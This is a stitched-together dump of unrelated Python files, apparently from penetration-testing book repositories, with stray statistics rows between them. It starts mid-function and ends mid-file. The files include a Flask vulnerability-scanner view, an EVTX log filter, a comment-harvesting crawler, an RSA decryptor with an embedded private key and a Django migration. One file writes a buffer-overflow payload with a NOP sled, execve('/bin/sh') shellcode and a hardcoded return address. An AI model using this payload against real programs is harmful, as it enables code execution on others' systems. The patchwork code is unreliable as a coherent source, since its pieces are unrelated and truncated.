    # task update: pull the edited values from the POSTed form
    task_name = request.form.get('taskname_val')
    task_plan = request.form.get('recursion_val')
    # one scan target per line in the textarea
    target_text = request.form.get('target_val').split('\n', -1)
    task_id = request.form.get('task_id')
    update_task_data = connectiondb(tasks_db).update_one(
        {'_id': ObjectId(task_id)},
        {'$set': {
            'task_name': task_name,
            'task_recursion': task_plan,
            'scan_target': target_text,
        }
        }
    )
    if update_task_data:
        # Re-run the scan with the new settings without blocking the request.
        scanner = PocsuiteScanner(ObjectId(task_id))
        t1 = Thread(target=scanner.set_scanner, args=())
        t1.start()
        return 'success'
# new scan view
@vul_scanner.route('/new-scan', methods=['GET'])
@login_check
def scan_view():
    """Render the new-scan form, listing every PoC plugin for selection."""
    return render_template('new-scan.html',
                           plugin_info=connectiondb(plugin_db).find())
# create task
@vul_scanner.route('/add-task', methods=['POST'])
@login_check
def add_task():
    """Create a scan task from a POSTed form and launch it on a background
    thread.

    POSTs arrive from three pages ('scan_view', 'asset', 'subdomain') that
    all submit identical fields, so the original's three duplicated branches
    collapse into one shared path. Returns 'success' once the scanner thread
    is started, 'error' if insertion failed, and (as before) None for an
    unknown source.
    """
    if request.form.get('source') in ('scan_view', 'asset', 'subdomain'):
        task_data = {
            # Task names are prefixed with the current date (yymmdd_).
            "task_name": time.strftime("%y%m%d", time.localtime()) + "_" + request.form.get('taskname_val'),
            "task_recursion": request.form.get('recursion_val'),
            # One target per textarea line; strip CRs from CRLF submissions.
            "scan_target": request.form.get('target_val').replace('\r', '').split('\n', -1),
            "plugin_id": request.form.get('plugin_val').split(',', -1),
            "start_date": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),
            "end_date": "-",
            "task_status": "Preparation"
        }
        task_id = connectiondb(tasks_db).insert_one(task_data).inserted_id
        if task_id:
            # Run the PoC scanner without blocking the HTTP request.
            scanner = PocsuiteScanner(task_id)
            t1 = Thread(target=scanner.set_scanner, args=())
            t1.start()
            return 'success'
        return 'error'
@vul_scanner.route('/vulnerability', methods=['POST', 'GET'])
@login_check
def vulnerability_view():
    """Vulnerability list page plus its AJAX endpoints.

    GET query parameters select sub-actions: delete (soft delete), rescan
    (not implemented), result (detail JSON), task / plugin (filtered list
    views). POST is reserved for batch deletion (not implemented).
    """
    if request.method == "GET":
        # vulnerability delete: soft delete -- the record is tagged, not removed
        if request.args.get('delete'):
            vul_id = request.args.get('delete')
            # task_id = connectiondb(vul_db).find_one({'_id': ObjectId(vul_id)})['task_id']
            # connectiondb(vul_db).delete_one({'_id': ObjectId(vul_id)})
            connectiondb(vul_db).update({'_id': ObjectId(vul_id)}, {"$set": {"tag": "delete"}}, multi=True)
            return redirect(url_for('vul_scanner.vulnerability_view'))
        # vulnerability rescan (Not completed)
        elif request.args.get('rescan'):
            vul_id = request.args.get('rescan')
            print(vul_id)
            # Not completed
        # vulnerability details, returned as JSON for the detail modal
        elif request.args.get('result'):
            vul_id = request.args.get('result')
            vul_info = connectiondb(vul_db).find_one({'_id': ObjectId(vul_id)})
            # Strip Mongo-internal ObjectIds, which are not JSON serializable.
            del vul_info['_id']
            del vul_info['task_id']
            del vul_info['plugin_id']
            if vul_info:
                return jsonify(vul_info)
            else:
                return jsonify({"result": "Get details error"})
        # from task view screening vulnerabilities by task_id
        elif request.args.get('task'):
            task_id = request.args.get('task')
            vul_data = connectiondb(vul_db).find({'task_id': ObjectId(task_id), "tag": {"$ne": "delete"}}).sort(
                'scan_date', -1)
            return render_template('vulnerability.html', vul_data=vul_data)
        # from plugin view screening vulnerabilities by plugin_id
        elif request.args.get('plugin'):
            plugin_id = request.args.get('plugin')
            vul_data = connectiondb(vul_db).find({'plugin_id': ObjectId(plugin_id),
                                                  "tag": {"$ne": "delete"}}).sort('date', -1)
            return render_template('vulnerability.html', vul_data=vul_data)
        # default vulnerability view: everything not soft-deleted
        vul_data = connectiondb(vul_db).find({"tag": {"$ne": "delete"}}).sort('date', -1)
        return render_template('vulnerability.html', vul_data=vul_data)
    elif request.method == "POST":
        # delete multiple choices
        # Not completed
        return jsonify({'result': 'success'})
| 38.515982 | 112 | 0.566046 |
cybersecurity-penetration-testing | #!/usr/bin/env python
import mmap
import contextlib
import argparse
from xml.dom import minidom
from Evtx.Evtx import FileHeader
from Evtx.Views import evtx_file_xml_view
def main():
    """Filter a binary EVTX log: append every record whose EventID matches
    --eventID to the output file, wrapped in an <Events> root element."""
    parser = argparse.ArgumentParser(description="Dump specific event ids from a binary EVTX file into XML.")
    parser.add_argument("--cleanup", action="store_true", help="Cleanup unused XML entities (slower)")
    parser.add_argument("evtx", type=str, help="Path to the Windows EVTX event log file")
    parser.add_argument("out", type=str, help="Path and name of the output file")
    parser.add_argument("--eventID", type=int, help="Event id that should be extracted")
    args = parser.parse_args()
    # 'with' flushes and closes both files even on errors -- the original
    # never closed the output handle. Note the 'a+' mode appends, so repeat
    # runs add another <Events> document to the same file (kept as-is).
    with open(args.out, 'a+') as outFile:
        with open(args.evtx, 'r') as f:
            # mmap the log so the EVTX parser can seek freely without reads.
            with contextlib.closing(mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ)) as buf:
                fh = FileHeader(buf, 0x0)
                outFile.write("<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\" ?>")
                outFile.write("<Events>")
                for xml, record in evtx_file_xml_view(fh):
                    xmldoc = minidom.parseString(xml)
                    event_id = xmldoc.getElementsByTagName('EventID')[0].childNodes[0].nodeValue
                    # Keep only records with the requested event id.
                    if event_id == str(args.eventID):
                        outFile.write(xml)
                outFile.write("</Events>")


if __name__ == "__main__":
    main()
Penetration-Testing-with-Shellcode | #!/usr/bin/python
from struct import *
# Payload layout: 232-byte NOP sled, 32-byte execve("//bin/sh") x86-64
# shellcode, then the little-endian saved-return-address overwrite pointing
# back into the sled.
buffer = ''
buffer += '\x90'*232
buffer += '\x48\x31\xc0\x50\x48\x89\xe2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05'
buffer += pack("<Q", 0x7fffffffe2c0)
# 'with' guarantees the payload is flushed and the handle closed (the
# original relied on interpreter exit to close the file).
with open("input.txt", "w") as f:
    f.write(buffer)
| 28.5 | 140 | 0.676871 |
Python-Penetration-Testing-for-Developers | import sys
import time
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class Screenshot(QWebView):
    """Headless page renderer: loads a URL in an off-screen QWebView and
    returns the fully rendered page as a QImage."""

    def __init__(self):
        # A QApplication must exist before any Qt widget can be created.
        self.app = QApplication(sys.argv)
        QWebView.__init__(self)
        self._loaded = False
        self.loadFinished.connect(self._loadFinished)

    def wait_load(self, delay=0):
        # Pump the Qt event loop until loadFinished fires, then reset the
        # flag so the instance can be reused for another URL.
        while not self._loaded:
            self.app.processEvents()
            time.sleep(delay)
        self._loaded = False

    def _loadFinished(self, result):
        # Qt signal handler; `result` (the load-success flag) is ignored.
        self._loaded = True

    def get_image(self, url):
        """Load `url`, grow the viewport to the full page size and paint
        the main frame into an ARGB32 QImage, which is returned."""
        self.load(QUrl(url))
        self.wait_load()
        frame = self.page().mainFrame()
        # Size the viewport to the whole document so nothing is clipped.
        self.page().setViewportSize(frame.contentsSize())
        image = QImage(self.page().viewportSize(), QImage.Format_ARGB32)
        painter = QPainter(image)
        frame.render(painter)
        painter.end()
        return image
# Example usage: render packtpub.com and save the capture to disk.
s = Screenshot()
image = s.get_image('http://www.packtpub.com')
image.save('website.png')
| 25 | 72 | 0.609082 |
cybersecurity-penetration-testing | import requests
import re
from bs4 import BeautifulSoup
import sys

# Harvest HTML comments from a target page and collect its same-site links
# for a second crawling pass. Usage: script.py <targeturl>
if len(sys.argv) !=2:
    print "usage: %s targeturl" % (sys.argv[0])
    sys.exit(0)
urls = []
tarurl = sys.argv[1]
url = requests.get(tarurl)
# Grab everything between <!-- and --> on the start page.
comments = re.findall('<!--(.*)-->',url.text)
print "Comments on page: "+tarurl
for comment in comments:
    print comment
# Collect absolute URLs that contain the target, plus site-relative links.
soup = BeautifulSoup(url.text)
for line in soup.find_all('a'):
    newline = line.get('href')
    try:
        if newline[:4] == "http":
            if tarurl in newline:
                urls.append(str(newline))
        elif newline[:1] == "/":
            combline = tarurl+newline
            urls.append(str(combline))
    except:
        # href missing or not sliceable (e.g. None) -- skip this link.
        # NOTE(review): the original's indentation of the print below is
        # ambiguous; as written it runs on every exception.
        pass
        print "failed"
for uurl in urls:
print "Comments on page: "+uurl
url = requests.get(uurl)
comments = re.findall('<!--(.*)-->',url.text)
for comment in comments:
print comment | 22.657895 | 49 | 0.58686 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python3.5
l1 = [1, 2, 3, 4]
l2 = [5, 6]
# Squares of the even elements of l1.
sq_even = [v * v for v in l1 if not v % 2]
# Pairwise sums over the cartesian product l1 x l2 (nested loops).
l_sum = [a + b for a in l1 for b in l2]
# One {value: square} dict per element of l1.
sq_values = [{v: v * v} for v in l1]
print("Even squares : " + str(sq_even))
print("Sum nested Loop : " + str(l_sum))
print("Squares Dict : " + str(sq_values))
| 23.727273 | 40 | 0.601476 |
cybersecurity-penetration-testing | import zlib
import base64
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
encrypted = """XxfaX7nfQ48K+l0rXM3tQf3ShFcytAQ4sLe6vn8bWdreho4riaJ5Dy5PeijSKbsgWSMoeZLmihxb0YAFgCaIp11AUl4kmIiY+c+8LJonbTTembxv98GePM1SEme5/vMwGORJilw+rTdORSHzwbC56sw5NG8KosgLWwHEGEGbhii2qBkuyQrIc9ydoOKKCe0ofTRnaI2c/lb9Ot3vkEIgxCks94H6qVkAfhO34HS7nClUldn9UN040RYgtEqBgvAFzoEhDuRtfjJu1dzyzaFtRAVhcQ6HdgZMWRfpaxKQOmbhXwYyGRQfwNl/Rwgn1EJBFAhvIaEifHDlCw+hLViNYlae7IdfIb6hWtWPyFrkaNjmkbhhXclNgZe0+iPPDzsZbpHI1IckG0gVlTdlGKGz+nK5Cxyso41icC4gO7tmdXDGgF6bMt/GC1VjMVmL/rYsb8jzJblmuQBAeFNacyhjxrzIH5v60RQ1BxwfD+wLCKfyzn3vQucPak2cnwBs3yTIEShYj0ymP4idU/5Qt5qkqMDyvO4U8DmqB4KT58+o2B3c88+lUZjz7c9ygwKjp2hSNf+Dm9H3YJY2Pn6YlydyT1sYWCy06DZko7z3uae5GYGjez8hnCIFt+mpeLvEelSHeZfyV8wYyHg5Y9eA2NZNX6yNVD8IREhjXGWdbGTn41lVCqEiCetY9SKdWeL1Hp/vJN3SOo4qglbQF7P6oqqg0bofnAcphLVaHw/FOGWtW1CFEQUQdIg9bk+SJqM/s1ozJlisenrRzxv3L5LthEfLflCafK0u3n2gPa4F3ok4tx9i+r+MykRTw+OksMfVu71CAMuJdrFQLMSpyWkQ86Vc/QIXgdoCKkAYx5xr/U8gDXkZ4GvL9biEZv/fb5Wh7Br1Hu6idUgTYpEJVVnMuI13ePGeJLA54Il2S7aDyrgfhb61WQmoMRGvLP7uxCjgLwrxZNjAYJTmXszLvvgmI+lHe5o8rgQw6zSGpl9k27urV4bA0Zt+PsYiLNbEQqqxrJxKcbKqozl8XtfMXanct9pKu4vaq8fH/j9jvZ133UtcaR5iTQ0K7P4J5Qoaxz3uUhGrgplZ1jE9Nr0iyRj722dW82b4m1f/h80K7EuvwEeOfdYZl7iFL8yRi9dfopwATjKbKrWFroGCb/wvpc5ujpzDfwAeWsSU4Nve2qBDo5coVt1GI8rzHUh52TQ007JhcYABIxZGSFeeJ3bFgvqO2kUK/Pc36Au0VlNFds/j+fIuMlmFUuckBLCTpE2W9hYqmVOWBmyeZPJNzVI4gLexFbXbg8+0Eq6Pa4MxZsR3wypgC9LE/dvLbQ3oSn9x7nKMXpdq9r+xK1sjodpeYNz7t/5GpFu1teN0SFbmsoXjVEyOAn3L5Gd4Wxua7y9xOixc1H2/bbyNqJZAjEm34DDmNRTQtrqCwOEXwFGKgRGUzPYGC74wAPDDTaQEBv7Toc7rfkzgRX4ROW0SUaEPmi5tAlXe+CKVdJGtLKXUXYRHLMZ4jTzGsD89dmt2r2Fh6AUUN2e9jzzK2ULMnMhRUnDdcM74jbuDHGtXt56pFxFKJ21FQFS8JK0ZOqYa+0JjLuSzrLN9gSCu/JuTPC60LTxLsLcWZVR7cIHQE+sgDtt40/6O1YE7/8rs6qB9re28gDY1s9R5HFtjowO3ylRWqlaV9MC1OGzM4xHPxG2V+2zuq6ol8Cs="""
private_key = """-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAyXUTgFoL/2EPKoN31l5Tlak7VxhdusNCWQKDfcN5Jj45GQ1o
ZZjsECQ8jK5AaQuCWdmEQkgCEV23L2y71G+Th/zlVPjp0hgC6nOKOuwmlQ1jGvfV
vaNZ0YXrs+sX/wg5FT/bTS4yzXeW6920tdls2N7Pu5N1FLRW5PMhk6GW5rzVhwdD
vnfaUoSVj7oKaIMLbN/TENvnwhZZKlTZeK79ix4qXwYLe66CrgCHDf4oBJ/nO1oY
welxuIXVPhIZnVpkbz3IL6BfEZ3ZDKzGeRs6YLZuR2u5KUbr9uabEzgtrLyOeoK8
UscKmzOvtwxZDcgNijqMJKuqpNZczPHmf9cS1wIDAQABAoIBAAdOiMOKAI9lrNAk
7o7G4w81kSJqjtO8S0bBMZW5Jka90QJYmyW8MyuutMeBdnKY6URrAEILLJAGryM4
NWPSHC69fG/li02Ec26ffC8A67FSR/rtbEIxj4tq6Q6gg0FLwg5EP6b/+vW61a1+
YBSMa0c+ZZhvE7sJg3FQZDJflQKPXFHYxOlS42+UyUP8K07cFznsQCvia9mCHUG6
BDFbV/yjbMyYgKTCVmMeaCS2K0TlbcyGpF0Bz95mVpkrU6pHXY0UAJIv4dyguywe
dBZcJlruSRL0OJ+3Gb3CJS7YdsPW807LSyf8gcrHMpgV5z2CdGlaoaLBJyS/nDHi
n07PIbECgYEA4Rjlet1xL/Sr9HnHVUH0m1iST0SrLlQCzrMkiw4g5rCOCnhWPNQE
dpnRpgUWMhhyZj82SwigkdXC2GpvBP6GDg9pB3Njs8qkwEsGI8GFhUQfKf8Bnnd2
w3GUHiRoJpVxrrE3byh23pUiHBdbp7h2+EaOTrRsc2w3Q4NbNF+FOOkCgYEA5R1Z
KvuKn1Sq+0EWpb8fZB+PTwK60qObRENbLdnbmGrVwjNxiBWE4BausHMr0Bz/cQzk
tDyohkHx8clp6Qt+hRFd5CXXNidaelkCDLZ7dasddXm1bmIlTIHjWWSsUEsgUTh7
crjVvghU2Sqs/vCLJCW6WYGb9JD2BI5R9pOClb8CgYEAlsOtGBDvebY/4fwaxYDq
i43UWSFeIiaExtr30+c/pCOGz35wDEfZQXKfF7p6dk0nelJGVBVQLr1kxrzq5QZw
1UP/Dc18bvSASoc1codwnaTV1rQE6pWLRzZwhYvO8mDQBriNr3cDvutWMEh4zCpi
DMJ9GDwCE4DctuxpDvgXa9kCgYEAuxNjo30Qi1iO4+kZnOyZrR833MPV1/hO50Y4
RRAGBkX1lER9ByjK/k6HBPyFYcDLsntcou6EjFt8OnjDSc5g2DZ9+7QKLeWkMxJK
Yib+V+4Id8uRIThyTC4ifPN+33D4SllcMyhJHome/lOiPegbNMC5kCwMM33J455x
vmxjy/ECgYAOrFR7A9fP4QlPqFCQKDio/FhoQy5ERpl94lGozk4Ma+QDJiRUxA3N
GomBPAvYGntvGgPWrsEHrS01ZoOKGBfk5MgubSPFVI00BD6lccmff/0tOxYtb+Pp
vOGHt9D9yo3DOhyvJbedpi3u3g13G+FZFw6d1T8Jzm5eZUvG7WeUtg==
-----END RSA PRIVATE KEY-----"""
# Build an OAEP decryptor from the embedded 2048-bit RSA private key.
rsakey = RSA.importKey(private_key)
rsakey = PKCS1_OAEP.new(rsakey)
offset = 0
decrypted = ""
encrypted = base64.b64decode(encrypted)
# The ciphertext is a sequence of independent 256-byte (2048-bit) RSA
# blocks; decrypt each block and concatenate the results.
while offset < len(encrypted):
    decrypted += rsakey.decrypt(encrypted[offset:offset+256])
    offset += 256
# now we decompress to original
plaintext = zlib.decompress(decrypted)
print plaintext
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Auto-generated South schema migration: create every xtreme_server
        table (BlindProject, Project, Page, Form, InputField, Vulnerability,
        Settings, LearntModel)."""
        # Adding model 'BlindProject'
        db.create_table(u'xtreme_server_blindproject', (
            ('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
            ('public_IP', self.gf('django.db.models.fields.TextField')()),
            ('blind_URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('method', self.gf('django.db.models.fields.TextField')()),
            ('param_name', self.gf('django.db.models.fields.TextField')()),
            ('param_value', self.gf('django.db.models.fields.TextField')()),
            ('match_string', self.gf('django.db.models.fields.TextField')()),
            ('success_flg', self.gf('django.db.models.fields.TextField')()),
            ('project_status', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal(u'xtreme_server', ['BlindProject'])

        # Adding model 'Project'
        db.create_table(u'xtreme_server_project', (
            ('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
            ('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
            ('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
            ('consider_only', self.gf('django.db.models.fields.TextField')()),
            ('exclude_fields', self.gf('django.db.models.fields.TextField')()),
            ('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
            ('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('username', self.gf('django.db.models.fields.TextField')()),
            ('password', self.gf('django.db.models.fields.TextField')()),
            ('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
            ('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
            ('auth_parameters', self.gf('django.db.models.fields.TextField')(default='Not Set')),
            ('queueName', self.gf('django.db.models.fields.TextField')(default='-1')),
            ('auth_mode', self.gf('django.db.models.fields.TextField')(default='Not Set')),
        ))
        db.send_create_signal(u'xtreme_server', ['Project'])

        # Adding model 'Page'
        db.create_table(u'xtreme_server_page', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('content', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
            ('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
            ('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['Page'])

        # Adding model 'Form'
        db.create_table(u'xtreme_server_form', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
            ('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
            ('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
            ('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
            ('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
            ('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['Form'])

        # Adding model 'InputField'
        db.create_table(u'xtreme_server_inputfield', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
            ('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['InputField'])

        # Adding model 'Vulnerability'
        db.create_table(u'xtreme_server_vulnerability', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
            ('details', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('url', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('re_attack', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('project', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('timestamp', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('msg_type', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('msg', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('auth', self.gf('django.db.models.fields.TextField')(blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['Vulnerability'])

        # Adding model 'Settings'
        db.create_table(u'xtreme_server_settings', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
            ('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
            ('consider_only', self.gf('django.db.models.fields.TextField')()),
            ('exclude_fields', self.gf('django.db.models.fields.TextField')()),
            ('username', self.gf('django.db.models.fields.TextField')()),
            ('password', self.gf('django.db.models.fields.TextField')()),
            ('auth_mode', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal(u'xtreme_server', ['Settings'])

        # Adding model 'LearntModel'
        db.create_table(u'xtreme_server_learntmodel', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
            ('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
            ('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
            ('query_id', self.gf('django.db.models.fields.TextField')()),
            ('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
        ))
        db.send_create_signal(u'xtreme_server', ['LearntModel'])
    def backwards(self, orm):
        """Reverse this South migration: drop every table created in forwards()."""
        # Deleting model 'BlindProject'
        db.delete_table(u'xtreme_server_blindproject')
        # Deleting model 'Project'
        db.delete_table(u'xtreme_server_project')
        # Deleting model 'Page'
        db.delete_table(u'xtreme_server_page')
        # Deleting model 'Form'
        db.delete_table(u'xtreme_server_form')
        # Deleting model 'InputField'
        db.delete_table(u'xtreme_server_inputfield')
        # Deleting model 'Vulnerability'
        db.delete_table(u'xtreme_server_vulnerability')
        # Deleting model 'Settings'
        db.delete_table(u'xtreme_server_settings')
        # Deleting model 'LearntModel'
        db.delete_table(u'xtreme_server_learntmodel')
models = {
u'xtreme_server.blindproject': {
'Meta': {'object_name': 'BlindProject'},
'blind_URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'match_string': ('django.db.models.fields.TextField', [], {}),
'method': ('django.db.models.fields.TextField', [], {}),
'param_name': ('django.db.models.fields.TextField', [], {}),
'param_value': ('django.db.models.fields.TextField', [], {}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'project_status': ('django.db.models.fields.TextField', [], {}),
'public_IP': ('django.db.models.fields.TextField', [], {}),
'success_flg': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'auth_parameters': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'queueName': ('django.db.models.fields.TextField', [], {'default': "'-1'"}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 64.259109 | 130 | 0.56955 |
Mastering-Machine-Learning-for-Penetration-Testing | from sklearn.svm import LinearSVC
from sklearn.datasets import load_iris
from sklearn.feature_selection import SelectFromModel
# Fit the iris data with an L1-penalised linear SVM; the L1 penalty drives
# some feature coefficients to exactly zero, which SelectFromModel then
# uses to discard those features.
iris = load_iris()
X, y = iris.data, iris.target
X.shape  # NOTE(review): bare expression -- REPL leftover, has no effect in a script
lsvc = LinearSVC(C=0.01, penalty="l1", dual=False).fit(X, y)
model = SelectFromModel(lsvc, prefit=True)  # prefit: reuse the already-fitted estimator
X_new = model.transform(X)  # keep only columns with non-zero SVM weights
X_new.shape  # NOTE(review): bare expression -- REPL leftover, has no effect in a script
| 24.384615 | 60 | 0.759878 |
cybersecurity-penetration-testing | import xlsxwriter
from datetime import datetime
# Sample spreadsheet rows: [department, student count, cumulative GPA, final date].
# NOTE(review): leading-zero integer literals such as 07 are Python 2 octal
# syntax; these lines are a SyntaxError under Python 3.
